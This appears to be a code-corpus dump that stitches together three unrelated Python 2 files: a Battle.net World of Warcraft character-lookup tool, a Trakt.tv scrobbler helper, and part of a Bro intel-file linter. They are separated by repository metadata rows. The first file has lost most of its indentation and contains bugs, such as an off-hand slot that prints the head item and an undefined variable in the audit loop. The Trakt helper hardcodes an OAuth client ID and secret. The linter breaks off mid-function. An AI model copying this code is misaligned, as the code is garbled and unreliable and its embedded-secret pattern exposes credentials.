character_group.add_option("--audit", action="store_true", dest="audit", help="Audit the character")
options.add_option_group(character_group)
base_url = "http://eu.battle.net/api/wow"
def check_sub_character_options():
requests = []
if opts.guild:
requests.append('guild')
if opts.items:
requests.append('items')
if opts.mounts:
requests.append('mounts')
if opts.pvp:
requests.append('pvp')
if opts.quests:
requests.append('quests')
if opts.reputation:
requests.append('reputation')
if opts.stats:
requests.append('stats')
if opts.talents:
requests.append('talents')
if opts.audit:
requests.append('audit')
return requests
def query_api(url):
    try:
        s = requests.get(url).json()
    except Exception as e:
        print "ERROR: unable to query " + url + " - " + str(e)
        sys.exit(1)
    # the Battle.net API reports failures via a top-level "reason" field
    if "reason" in s:
        print "ERROR: " + s["reason"]
        sys.exit(1)
    return s
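# Example (illustrative): query_api(base_url + "/data/character/races")
# returns the decoded JSON dict, or exits after printing the API's "reason".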
def auction_house(realm):
print "THIS SECTION IS BROKEN, EU AUCTION HOUSE IS MIA!"
return
url = base_url + "/api/wow/auction/data/" + realm
s = query_api(url)
print s
def character_male_female(n):
if n == 0:
return "Male"
if n == 1:
return "Female"
def character_class(n):
url = base_url + "/data/character/classes"
classes = query_api(url)
for cclass in classes['classes']:
if cclass['id'] == n:
return cclass['name']
def character_race(n):
url = base_url + "/data/character/races"
races = query_api(url)
for craces in races['races']:
if craces['id'] == n:
return craces['name']
def character_search(name, realm):
fields = check_sub_character_options()
url = base_url + "/character"
print "\nCharacter search for " + name + " on " + realm + "\n"
url = url + "/" + realm.title()
url = url + "/" + name.title()
#See if any sub fields are queried
if fields:
fields = ",".join(fields)
url = url + "?fields=" + fields
#Try and request the data from the API
s = query_api(url)
parse_char_info(s)
#PRINT EXTRA INFO AT THE BOTTOM:
if opts.guild:
character_guild(s)
if opts.items:
character_items(s)
if opts.mounts:
character_mounts(s)
if opts.pvp:
character_pvp(s)
if opts.quests:
character_quests(s)
if opts.reputation:
character_reputation(s)
if opts.stats:
character_stats(s)
if opts.talents:
character_talents(s)
if opts.audit:
character_audit(s)
def parse_char_info(char_api_data):
print "Realm: " + str(char_api_data["realm"])
print "Name: " + str(char_api_data["name"])
print "Level: " + str(char_api_data["level"])
print "Class: " + character_class(char_api_data["class"])
print "Race: " + character_race(char_api_data["race"])
print "Calc Class: " + str(char_api_data["calcClass"])
print "Gender: " + character_male_female(char_api_data["gender"])
print "Achievement Points: " + str(char_api_data["achievementPoints"])
print "Total Honorable Kills: " + str(char_api_data["totalHonorableKills"])
print "Battlegroup: " + str(char_api_data["battlegroup"])
print "Last Modified: " + str(datetime.datetime.fromtimestamp(char_api_data["lastModified"]/1000).strftime('%Y-%m-%d %H:%M:%S'))
print "Thumbnail: http://eu.battle.net/static-render/eu/" + str(char_api_data["thumbnail"])
def character_reputation(s):
print "\n\tReputation:"
names = []
for long_names in s["reputation"]:
if (long_names["value"] != 0) and (long_names["standing"] > 0):
names.append(long_names["name"])
longest = len(max(names, key=len))
for reps in s["reputation"]:
minimum = str(reps["value"])
for x in xrange(3,5):
if len(minimum) < x:
minimum = minimum + " "
if (reps["value"] != 0) and (reps["standing"] > 0):
bar_length = 25
bar = reps["name"]
calc = round(float(reps["value"]) / float(reps["max"]) * bar_length)
empty = bar_length - calc #This is the length of the BAR
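            # worked example: value=4200, max=6000 -> calc=round(4200/6000*25)=18
            # filled cells and empty=7 blank cells in the 25-character bar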
calculate_empty_spaces = longest - len(bar)
line = u'█'
bar = bar + " "*calculate_empty_spaces + " (lvl:" + str(reps["standing"]) + ") " + minimum + " |" + line*int(calc) + " "*int(empty) + "| " + str(reps["max"])
print "\t" + bar
def character_guild(s):
print "\n\tGuild:"
guild_info = s["guild"]
print "\tName: " + guild_info["name"]
print "\tTotal Achievement Points: " + str(guild_info["achievementPoints"])
print "\tTotal Members: " + str(guild_info["members"])
def character_pvp(s):
twovtwo = s["pvp"]["brackets"]["ARENA_BRACKET_2v2"]
threevthree = s["pvp"]["brackets"]["ARENA_BRACKET_3v3"]
fivevfive = s["pvp"]["brackets"]["ARENA_BRACKET_5v5"]
RBG = s["pvp"]["brackets"]["ARENA_BRACKET_RBG"]
print "\n\tPvP Ratings:"
print "\t2v2:"
print "\t\tRating: " + str(twovtwo["rating"])
print "\t\tSeason Won: " + str(twovtwo["seasonWon"])
print "\t\tSeason Played: " + str(twovtwo["seasonPlayed"])
print "\t\tWeekly Won: " + str(twovtwo["weeklyWon"])
print "\t\tWeekly Played " + str(twovtwo["weeklyPlayed"])
print "\t3v3: "
print "\t\tRating: " + str(threevthree["rating"])
print "\t\tSeason Won: " + str(threevthree["seasonWon"])
print "\t\tSeason Played: " + str(threevthree["seasonPlayed"])
print "\t\tWeekly Won: " + str(threevthree["weeklyWon"])
print "\t\tWeekly Played " + str(threevthree["weeklyPlayed"])
print "\t5v5: "
print "\t\tRating: " + str(fivevfive["rating"])
print "\t\tSeason Won: " + str(fivevfive["seasonWon"])
print "\t\tSeason Played: " + str(fivevfive["seasonPlayed"])
print "\t\tWeekly Won: " + str(fivevfive["weeklyWon"])
print "\t\tWeekly Played " + str(fivevfive["weeklyPlayed"])
print "\tRated BG: "
print "\t\tRating: " + str(RBG["rating"])
print "\t\tSeason Won: " + str(RBG["seasonWon"])
print "\t\tSeason Played: " + str(RBG["seasonPlayed"])
print "\t\tWeekly Won: " + str(RBG["weeklyWon"])
print "\t\tWeekly Played " + str(RBG["weeklyPlayed"])
def character_items(s):
all_items = s["items"]
print "\n\tItems:"
print "\tHead: " + str(all_items["head"]["name"]) + " ilvl: " + str(all_items["head"]["itemLevel"])
print "\tShoulders: " + str(all_items["shoulder"]["name"]) + " ilvl: " + str(all_items["shoulder"]["itemLevel"])
print "\tNeck: " + str(all_items["neck"]["name"]) + " ilvl: " + str(all_items["neck"]["itemLevel"])
print "\tBack: " + str(all_items["back"]["name"]) + " ilvl: " + str(all_items["back"]["itemLevel"])
print "\tFeet: " + str(all_items["feet"]["name"]) + " ilvl: " + str(all_items["feet"]["itemLevel"])
print "\tWrist: " + str(all_items["wrist"]["name"]) + " ilvl: " + str(all_items["wrist"]["itemLevel"])
print "\tMain Hand: " + str(all_items["mainHand"]["name"]) + " ilvl: " + str(all_items["mainHand"]["itemLevel"])
print "\tOff Hand:" + str(all_items["head"]["name"]) + " ilvl: " + str(all_items["head"]["itemLevel"])
print "\tHands: " + str(all_items["hands"]["name"]) + " ilvl: " + str(all_items["hands"]["itemLevel"])
print "\tLegs: " + str(all_items["legs"]["name"]) + " ilvl: " + str(all_items["legs"]["itemLevel"])
print "\tWaist: " + str(all_items["waist"]["name"]) + " ilvl: " + str(all_items["waist"]["itemLevel"])
print "\tFinger 1: " + str(all_items["finger1"]["name"]) + " ilvl: " + str(all_items["finger1"]["itemLevel"])
print "\tFinger 2: " + str(all_items["finger2"]["name"]) + " ilvl: " + str(all_items["finger2"]["itemLevel"])
print "\tTrinket 1: " + str(all_items["trinket1"]["name"]) + " ilvl: " + str(all_items["trinket1"]["itemLevel"])
print "\tTrinket 2: " + str(all_items["trinket2"]["name"]) + " ilvl: " + str(all_items["trinket2"]["itemLevel"])
print "\tAverage ilvl: " + str(all_items["averageItemLevel"])
print "\tAverage ilvl Equipped: " + str(all_items["averageItemLevelEquipped"])
def character_mounts(s):
mounts = s["mounts"]["collected"]
print "\n\tMounts Collected:"
for mount in mounts:
print "\t" + mount["name"]
def character_quests(s):
quests = s["quests"]
print "\n\tQuests:"
quest_continue = query_yes_no("\tThis can take some time, do you want to continue?", None)
if quest_continue == "yes":
for quest in quests:
quest_url = "http://www.wowhead.com/quest=" + str(quest)
#Lets do something for the user, and warn him this might take long, because were grabbing the title etc.
soup = BeautifulSoup(urllib2.urlopen(quest_url))
quest_name = soup.title.string.split('-')
print "\t" + quest_name[0] + "(http://www.wowhead.com/quest=" + str(quest) + ")"
else:
return
def character_stats(s):
stats = s["stats"]
longest_stat_name = []
for long_name in stats:
longest_stat_name.append(long_name)
longest_stat_name = len(max(longest_stat_name, key=len))
spacing = 30
spacing = spacing - longest_stat_name
print "\n\tStats:"
print "\t------Attributes------\r"
print "\tHealth: " + str(stats["health"])
print "\tStrength: " + str(stats["str"])
print "\tAgility: " + str(stats["agi"])
print "\tIntellect: " + str(stats["int"])
print "\tStamina: " + str(stats["sta"])
print "\tPowertype: " + str(stats["powerType"])
print "\tPower: " + str(stats["power"])
print "\tAttack Power: " + str(stats["attackPower"])
print "\t------Attack------\r"
print "\tMain hand dps: " + str(stats["mainHandDps"])
print "\tMain Hand DMG Max: " + str(stats["mainHandDmgMax"])
print "\tMain hand DMG Min: " + str(stats["mainHandDmgMin"])
print "\tMainhand Speed: " + str(stats["mainHandSpeed"])
print "\tOff-Hand DPS: " + str(stats["offHandDps"])
print "\tOff-Hand DMG Max: " + str(stats["offHandDmgMax"])
print "\tOff-Hand DMG Min: " + str(stats["offHandDmgMin"])
print "\tOff-Hand Speed: " + str(stats["offHandSpeed"])
print "\t------Spell------\r"
print "\tSpell Power: " + str(stats["spellPower"])
print "\tSpell Crit: " + str(stats["spellCrit"])
print "\tSpell Penetration: " + str(stats["spellPen"])
print "\tMana Regen in Combat: " + str(stats["mana5Combat"])
print "\tMana Regen outside Combat: " + str(stats["mana5"])
print "\t------Defence------\r"
print "\tArmor: " + str(stats["armor"])
print "\tDodge: " + str(stats["dodge"]) + "%"
print "\tParry: " + str(stats["parry"]) + "%"
print "\tBlock: " + str(stats["block"]) + "%"
print "\t------Enhancements------\r"
print "\tCrit: " + str(stats["crit"]) + "%"
print "\tHaste: " + str(stats["haste"]) + "%"
print "\tMastery: " + str(stats["mastery"]) + "%"
print "\tSpirit: " + str(stats["spr"])
print "\tBonus Armor: " + str(stats["bonusArmor"])
print "\tMultistrike: " + str(stats["multistrike"]) + "%"
print "\tVersatility: " + str(stats["versatility"]) + "%"
print "\tLeech: " + str(stats["leech"]) + "%"
print "\tAvoidance Rating: " + str(stats["avoidanceRating"]) + "%"
def character_talents(s):
print "\n\tTalents:"
for talent in s["talents"]:
try:
if talent["selected"]:
print "\tActive Talent:"
except:
print "\n\tSecondary Talent:"
for tier in talent["talents"]:
print "\tTier " + str(tier["tier"]+1)
print "\t\tName: " + tier["spell"]["name"]
print "\t\tCast Time: " + tier["spell"]["castTime"]
try:
if tier["spell"]["powerCost"]:
print "\t\tPower Cost: " + tier["spell"]["powerCost"]
except:
pass
spell_description = "\t\tDescription: " + tier["spell"]["description"].replace("\n","")
print "\n\t\t".join(textwrap.wrap(spell_description, 64))
def character_audit(s):
print "\n\tCharacter Audit:"
if s["audit"]["missingLeatherworkerEnchants"] != {}:
print "\tLeather Worker Enchants Missing:"
for missing_leatherworker_enchant in s["audit"]["missingLeatherworkerEnchants"]:
print "\t\t" + missingLeatherworkerEnchants
if s["audit"]["emptyGlyphSlots"] > 0:
print "\tTotal Empty Glyph Slots: " + str(s["audit"]["emptyGlyphSlots"])
if s["audit"]["itemsWithEmptySockets"] != {}:
print "\tItems With Empty Sockets:"
for empty_sockets in s["audit"]["itemsWithEmptySockets"]:
print "\t\tItem: " + empty_sockets
if s["audit"]["missingExtraSockets"] != {}:
print "\tItems Missing Extra Sockets:"
for missing_sockets in s["audit"]["missingExtraSockets"]:
print "\t\tItem: " + missing_sockets
if s["audit"]["emptySockets"] > 0:
print "\tTotal Empty Sockets: " + str(s["audit"]["emptySockets"])
if s["audit"]["recommendedBeltBuckle"] != {}:
buckle_description = "Description: " + s["audit"]["recommendedBeltBuckle"]["itemSpells"][0]["spell"]["description"].replace("\n","")
print "\tRecommended Belt Buckle: "
print "\t\t" + str(s["audit"]["recommendedBeltBuckle"]["itemSpells"][0]["spell"]["name"]) + " (" + buckle_description + ")"
if s["audit"]["unenchantedItems"] != {}:
print "\tUnenchanted Items:"
for unenchanted_item in s["audit"]["unenchantedItems"]:
print "\t\tItem: " + unenchanted_item
if s["audit"]["numberOfIssues"] > 0:
print "\tNumber of Issues: " + str(s["audit"]["numberOfIssues"])
if s["audit"]["noSpec"]:
print "No Spec Detected!"
def query_yes_no(question, default="yes"):
valid = {"yes":"yes", "y":"yes", "ye":"yes",
"no":"no", "n":"no"}
if default == None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("\tinvalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("\tPlease respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
#MAIN FUNCTION
def main():
print " __ __ __ __ .__ "
print "/ \ / \____/ \ / \ _____ ______ |__|"
print "\ \/\/ / _ \ \/\/ / ______ \__ \ \____ \| |"
print " \ ( <_> ) / /_____/ / __ \| |_> > |"
print " \__/\ / \____/ \__/\ / python (____ / __/|__|"
print " \/ \/ \/|__| "
print " - @viljoenivan"
global opts
opts, args = options.parse_args()
if len(sys.argv) == 1:
options.print_help()
return
#Character stuff
if opts.charactersearch:
if opts.character and opts.realm:
character_search(opts.character, opts.realm)
#Auction House
if opts.auctionsearch:
if opts.realm:
auction_house(opts.realm)
if __name__ == '__main__':
main()
| mit | 4,502,594,035,306,280,400 | 42.827068 | 183 | 0.583919 | false | 3.216296 | false | false | false |
cristianmiranda/plex-trakt-scrobbler | src/helper/trakt.py | 1 | 6672 | import json
import logging
import os
import socket
import urllib
import urllib2
import urlparse
class Trakt(object):
CLIENT_ID = 'aa9cd9a641758c5c20f2076e657a199925a6d2409dcddd0c8737b0dc1e90b6b0'
CLIENT_SECRET = 'c6a1b1d563a521b4b126efd8847cd18d2a5533a702997f6401dd6e8f48c83faa'
USER_AGENT = 'plex-trakt-scrobbler'
def __init__(self, cfg):
self.logger = logging.getLogger(__name__)
self.cfg = cfg
'''
Common API methods
'''
def get_session(self):
if os.path.exists(self.cfg.get('plex-trakt-scrobbler', 'session')):
sessfp = open(self.cfg.get('plex-trakt-scrobbler', 'session'), 'r')
session = sessfp.read().strip()
sessfp.close()
return session
def _do_trakt_post(self, url, data):
f = urllib2.Request(url)
f.add_header('User-Agent', self.USER_AGENT)
try:
res = urllib2.urlopen(f, data)
return json.load(res)
except urllib2.URLError, e:
self.logger.error('Unable to submit post data {url} - {error}'.format(
url=url, error=e))
raise
def _get_auth_infos(self):
args = {
'client_id': self.CLIENT_ID
}
url = urlparse.urlunparse(('https',
'api-v2launch.trakt.tv',
'/oauth/device/code', '', '', ''))
res = self._do_trakt_post(url, urllib.urlencode(args))
return res
def _get_access_token(self, code):
args = {
'client_id': self.CLIENT_ID,
'client_secret': self.CLIENT_SECRET,
'code': code,
}
url = urlparse.urlunparse(('https',
'api-v2launch.trakt.tv',
'/oauth/device/token', '', '', ''))
res = self._do_trakt_post(url, urllib.urlencode(args))
return res
def trakt_auth(self):
print '== Requesting trakt.tv auth =='
auth_infos = self._get_auth_infos()
accepted = 'n'
print '\nPlease do the following to authorize the scrobbler:\n\n1/ Connect on {auth_url}\n2/ Enter the code: {code}'.format(
auth_url=auth_infos['verification_url'], code=auth_infos['user_code'])
while accepted.lower() == 'n':
print
accepted = raw_input('Have you authorized me? [y/N] :')
try:
access_token_infos = self._get_access_token(auth_infos['device_code'])
except urllib2.HTTPError, e:
self.logger.error('Unable to send authorization request {error}'.format(error=e))
return False
        if not access_token_infos.get('refresh_token'):
            print access_token_infos.get('message', 'No refresh token returned.')
            return
token = access_token_infos['access_token']
refresh_token = access_token_infos['refresh_token']
fp = open(self.cfg.get('plex-trakt-scrobbler', 'session'), 'w')
fp.write(token)
fp.close()
fp = open(self.cfg.get('plex-trakt-scrobbler', 'session') + '_refresh', 'w')
fp.write(refresh_token)
fp.close()
self.logger.info('Trak TV authorization successful.')
def _do_trakt_auth_post(self, url, data):
try:
session = self.get_session()
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + session,
'trakt-api-version': '2',
'trakt-api-key': self.CLIENT_ID
}
# timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)
request = urllib2.Request(url, data, headers)
response = urllib2.urlopen(request).read()
self.logger.info('Response: {0}'.format(response))
return response
except urllib2.HTTPError as e:
self.logger.error('Unable to submit post data {url} - {error}'.format(url=url, error=e.reason))
raise
def _do_trakt_auth_get(self, url):
return self._do_trakt_auth_post(url, None)
'''
Trakt TV API methods
'''
def get_media(self, media_id, source):
self.logger.info('Getting Media information with {source} id: {media_id} from trak.tv.'
.format(source=source, media_id=media_id))
url = urlparse.urlunparse(('https', 'api-v2launch.trakt.tv', '/search', '', '', ''))
url += '?id_type={source}&id={media_id}'.format(source=source, media_id=media_id)
try:
return self._do_trakt_auth_get(url)
except:
return None
def get_movie(self, imdb_id):
return self.get_media(imdb_id, 'imdb')
def get_show(self, tvdb_id):
return self.get_media(tvdb_id, 'tvdb')
def scrobble_show(self, show_name, season_number, episode_number, progress, scrobble_type):
self.logger.info(
'Scrobbling ({scrobble_type}) {show_name} - S{season_number}E{episode_number} - {progress} to trak.tv.'
.format(show_name=show_name, scrobble_type=scrobble_type, season_number=season_number.zfill(2),
episode_number=episode_number.zfill(2), progress=progress))
data = {}
data['show'] = {}
data['show']['title'] = show_name
data['episode'] = {}
data['episode']['season'] = int(season_number)
data['episode']['number'] = int(episode_number)
data['progress'] = int(progress)
data['app_version'] = '1.0'
data['app_date'] = '2014-09-22'
json_data = json.dumps(data)
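        # resulting payload, roughly (illustrative values):
        #   {"show": {"title": "Lost"}, "episode": {"season": 1, "number": 2},
        #    "progress": 95, "app_version": "1.0", "app_date": "2014-09-22"}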
url = urlparse.urlunparse(('https', 'api-v2launch.trakt.tv', '/scrobble/' + scrobble_type, '', '', ''))
try:
self._do_trakt_auth_post(url, json_data)
except:
return False
return True
def scrobble_movie(self, imdb_id, progress, scrobble_type):
self.logger.info('Scrobbling ({scrobble_type}) {imdb_id} - {progress} to trak.tv.'
.format(imdb_id=imdb_id, scrobble_type=scrobble_type, progress=progress))
data = {}
data['movie'] = {}
data['movie']['ids'] = {}
data['movie']['ids']['imdb'] = imdb_id
data['progress'] = int(progress)
data['app_version'] = '1.0'
data['app_date'] = '2014-09-22'
json_data = json.dumps(data)
url = urlparse.urlunparse(('https', 'api-v2launch.trakt.tv', '/scrobble/' + scrobble_type, '', '', ''))
try:
self._do_trakt_auth_post(url, json_data)
except:
return False
return True
| mit | 7,181,757,827,706,876,000 | 32.19403 | 132 | 0.552158 | false | 3.633987 | false | false | false |
packetsled/bro_intel_linter | intel_linter.py | 1 | 26250 | #!/usr/bin/python
#
# MixMode.ai - Bro Intel Linter
#
# WHEN WHAT WHO
# 03-04-2015 Initial development Aaron Eppert
# 08-24-2015 Explicitly verify single character fields Aaron Eppert
# 08-24-2015 GPL and pushed to GitHub Aaron Eppert
# 08-25-2015 Small cleanups and proper exit codes for using
# as a git pre-commit hook Aaron Eppert
# 09-01-2015 Added column-based type verifications Aaron Eppert
# 09-25-2015 Verify printable characters and escape in error Aaron Eppert
# 10-07-2015 Added --psled and --warn-only options Aaron Eppert
# 10-08-2015 Additional details - WARNING vs ERROR Aaron Eppert
# 03-03-2016 Minor bugfix Peter McKay
# 04-08-2016 Added Intel::NET support Aaron Eppert
# 06-02-2017 Fixed line ending issue Aaron Eppert
# 09-15-2017 Changed Intel::NET to Intel::SUBNET Kory Kyzar
# 03-28-2018 Fixed IPv6 validation Aaron Eppert
# 03-27-2019 Add Intel::PUBKEY_HASH and Intel::JA3 Aaron Eppert
# 07-13-2019  Add CERT HASH validation via regex for           Juan Jaramillo
#             MD5, SHA1, SHA256, SHA512 hashes.
import sys
import re
import string
from optparse import OptionParser
def write_stderr(msg):
sys.stderr.write(msg + '\n')
def warning_line(line, *objs):
out = 'WARNING: Line %d - ' % (int(line)+1)
for o in objs:
out += o
write_stderr(out)
def error_line(line, *objs):
out = 'ERROR: Line %d - ' % (int(line)+1)
for o in objs:
out += o
write_stderr(out)
def escape(c):
if ord(c) > 31 and ord(c) < 127:
return c
c = ord(c)
if c <= 0xff:
return r'\x{0:02x}'.format(c)
    elif c <= 0xffff:
return r'\u{0:04x}'.format(c)
else:
return r'\U{0:08x}'.format(c)
def hex_escape(s):
return ''.join(escape(c) for c in s)
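# e.g. hex_escape('abc\x00') -> 'abc\\x00' (non-printable bytes become escapes)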
class bro_intel_indicator_return:
OKAY = 0
WARNING = 1
ERROR = 2
###############################################################################
# class bro_intel_indicator_type
#
# This class is for handling the "indicator_type" fields within a Bro Intel
# file. Note, each type of field has a specific handler.
#
class bro_intel_indicator_type:
def __init__(self):
self.__INDICATOR_TYPE_handler = {'Intel::ADDR': self.__handle_intel_addr,
'Intel::SUBNET': self.__handle_intel_subnet,
'Intel::URL': self.__handle_intel_url,
'Intel::SOFTWARE': self.__handle_intel_software,
'Intel::EMAIL': self.__handle_intel_email,
'Intel::DOMAIN': self.__handle_intel_domain,
'Intel::USER_NAME': self.__handle_intel_user_name,
'Intel::FILE_HASH': self.__handle_intel_file_hash,
'Intel::FILE_NAME': self.__handle_intel_file_name,
'Intel::CERT_HASH': self.__handle_intel_cert_hash,
'Intel::PUBKEY_HASH': self.__handle_intel_pubkey_hash,
'Intel::JA3': self.__handle_intel_ja3_hash}
# Source: https://stackoverflow.com/questions/319279/how-to-validate-ip-address-in-python
def __is_valid_ipv4_address(self, address):
import socket
try:
socket.inet_pton(socket.AF_INET, address)
except AttributeError: # no inet_pton here, sorry
try:
socket.inet_aton(address)
except socket.error:
return False
return address.count('.') == 3
except socket.error: # not a valid address
return False
return True
# Source: https://stackoverflow.com/questions/319279/how-to-validate-ip-address-in-python
def __is_valid_ipv6_address(self, address):
import socket
try:
socket.inet_pton(socket.AF_INET6, address)
except socket.error: # not a valid address
return False
return True
def __handle_intel_addr(self, indicator):
ret = (bro_intel_indicator_return.OKAY, None)
if self.__is_valid_ipv4_address(indicator) or self.__is_valid_ipv6_address(indicator):
return ret
return (bro_intel_indicator_return.ERROR, 'Invalid IP address')
# In an effort to keep this script minimal and without requiring external
# libraries, we will verify an Intel::SUBNET simply as:
#
# 0 <= octet < 255
# 0 <= netmask <= 32
#
def __handle_intel_subnet(self, indicator):
ret = (bro_intel_indicator_return.OKAY, None)
if '/' in indicator:
addr, net = indicator.split('/')
if all([(int(x) >= 0 and int(x) < 255) for x in addr.split('.')]):
                if not (0 <= int(net) <= 32):
ret = (bro_intel_indicator_return.ERROR, 'Invalid network block designation')
else:
ret = (bro_intel_indicator_return.ERROR, 'Invalid network address')
else:
ret = (bro_intel_indicator_return.ERROR, 'Invalid network designation')
return ret
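    # e.g. '10.0.0.0/8' -> OKAY, '300.1.1.1/8' -> ERROR (octet out of range),
    # '10.0.0.0/40' -> ERROR (invalid network block); illustrative inputs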
# We will call this minimalist, but effective.
def __handle_intel_url(self, indicator):
ret = (bro_intel_indicator_return.OKAY, None)
t_uri_present = re.findall(r'^https?://', indicator)
if t_uri_present is not None and len(t_uri_present) > 0:
ret = (bro_intel_indicator_return.WARNING, 'URI present (e.g. http(s)://)')
else:
            rx = re.compile(r'^(?:https?://)?'  # optional http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
t = rx.search(indicator)
if t:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_email(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid email address')
rx = r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"
t_email = re.findall(rx, indicator)
if len(t_email) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_software(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid software string')
if len(indicator) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_domain(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid domain name')
rx = r'(?=^.{4,253}$)(^((?!-)[a-zA-Z0-9-]{1,63}(?<!-)\.)+[a-zA-Z]{2,63}$)'
t_domain = re.findall(rx, indicator)
if len(t_domain) > 0:
if indicator in t_domain[0]:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_user_name(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid username - %s' % (indicator))
if len(indicator) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_file_name(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid username length')
if len(indicator) > 0:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
# Pretty weak, but should suffice for now.
def __handle_intel_file_hash(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid hash length')
VALID_HASH_LEN = {32: 'md5',
40: 'sha1',
64: 'sha256'}
if VALID_HASH_LEN.get(len(indicator), None):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_cert_hash(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Invalid Intel::CERT_HASH - ISSUES %s' % (indicator))
hash_present = re.compile(
r'^[0-9A-F]{32}$|' # MD5
r'^[0-9A-F]{40}$|' # SHA1
r'^[0-9A-F]{64}$|' # SHA256
r'^[0-9A-F]{128}$', re.IGNORECASE) # SHA512
t = hash_present.search(indicator)
if t:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def __handle_intel_pubkey_hash(self, indicator):
return (bro_intel_indicator_return.WARNING, 'Intel::PUBKEY_HASH - Needs additional validation')
def __handle_intel_ja3_hash(self, indicator):
ret = (bro_intel_indicator_return.WARNING, 'Intel::JA3 - Needs additional validation')
if len(indicator) == 32:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_indicator_type(self, indicator_type):
ret = (bro_intel_indicator_return.ERROR, 'Invalid indicator - %s' % (indicator_type))
it = self.__INDICATOR_TYPE_handler.get(indicator_type, None)
if it is not None:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def correlate(self, indicator, indicator_type):
ret = (bro_intel_indicator_return.WARNING, 'Could not correlate - %s with %s' % (indicator, indicator_type))
if len(indicator) > 1 and len(indicator_type) > 1:
h = self.__INDICATOR_TYPE_handler.get(indicator_type, None)
if h:
ret = h(indicator)
else:
ret = (bro_intel_indicator_return.OKAY, None)
return ret
###############################################################################
# class bro_data_intel_field_values
#
# This class is for processing the individual Bro Intel fields and verifying
# their validity.
#
# Note, it may be easily expanded via adding entries to self.__VERIFY within
# the class constructor.
#
class bro_data_intel_field_values:
EMPTY_FIELD_CHAR = '-'
META_DO_NOTICE = ['T', 'F']
META_IF_IN = ['-',
'Conn::IN_ORIG',
'Conn::IN_RESP',
'Files::IN_HASH',
'Files::IN_NAME',
'DNS::IN_REQUEST',
'DNS::IN_RESPONSE',
'HTTP::IN_HOST_HEADER',
'HTTP::IN_REFERRER_HEADER',
'HTTP::IN_USER_AGENT_HEADER',
'HTTP::IN_X_FORWARDED_FOR_HEADER',
'HTTP::IN_URL',
'SMTP::IN_MAIL_FROM',
'SMTP::IN_RCPT_TO',
'SMTP::IN_FROM',
'SMTP::IN_TO',
'SMTP::IN_RECEIVED_HEADER',
'SMTP::IN_REPLY_TO',
'SMTP::IN_X_ORIGINATING_IP_HEADER',
'SMTP::IN_MESSAGE',
'SSL::IN_SERVER_CERT',
'SSL::IN_CLIENT_CERT',
'SSL::IN_SERVER_NAME',
'SMTP::IN_HEADER']
def __init__(self):
self.__VERIFY = {'indicator': self.verify_indicator,
'indicator_type': self.verify_indicator_type,
'meta.do_notice': self.verify_meta_do_notice,
'meta.if_in': self.verify_meta_if_in,
'meta.desc': self.verify_meta_desc,
'meta.source': self.verify_meta_source,
'meta.cif_confidence': self.verify_meta_cif_confidence,
'meta.url': self.verify_meta_url,
'meta.whitelist': self.verify_meta_whitelist,
'meta.severity': self.verify_meta_severity,
'meta.cif_severity': self.verify_meta_cif_severity,
'meta.cif_impact': self.verify_meta_cif_impact}
self.biit = bro_intel_indicator_type()
def get_verifier(self, v):
return self.__VERIFY.get(v, self.default)
def __verify_chars(self, t):
return all(ord(l) > 31 and ord(l) < 127 and l in string.printable for l in t)
def __is_ignore_field(self, t):
return self.EMPTY_FIELD_CHAR in t
def verify_indicator(self, t):
ret = (bro_intel_indicator_return.ERROR, 'Invalid indicator - %s' % (t))
if len(t) > 1 and self.__verify_chars(t):
ret = (bro_intel_indicator_return.OKAY, None)
return ret
def verify_indicator_type(self, t):
return self.biit.verify_indicator_type(t)
def correlate_indictor_and_indicator_type(self, i, it):
return self.biit.correlate(i, it)
def verify_meta_do_notice(self, t):
ret = (bro_intel_indicator_return.OKAY, None)
t_ret = t in bro_data_intel_field_values.META_DO_NOTICE
if not t_ret:
ret = (bro_intel_indicator_return.ERROR, 'Invalid do_notice - %s' % (str(t)))
return ret
def verify_meta_if_in(self, t):
ret = (bro_intel_indicator_return.OKAY, None)
t_ret = t in bro_data_intel_field_values.META_IF_IN
if not t_ret:
ret = (bro_intel_indicator_return.ERROR, 'Invalid if_in - %s' % (str(t)))
return ret
def verify_meta_cif_confidence(self, t):
ret = (bro_intel_indicator_return.ERROR, 'Invalid confidence - %s - Needs to be 1-100' % (str(t)))
try:
t_int = int(t)
            if isinstance(t_int, (int, long)) and (1 <= t_int <= 100):
ret = (bro_intel_indicator_return.OKAY, None)
except ValueError:
ret = (bro_intel_indicator_return.ERROR, 'Invalid confidence - %s - Needs to be 1-100' % (str(t)))
return ret
def verify_meta_desc(self, t):
ret = (bro_intel_indicator_return.WARNING, 'Invalid desc - %s' % (t))
if self.__is_ignore_field(t):
ret = (bro_intel_indicator_return.OKAY, None)
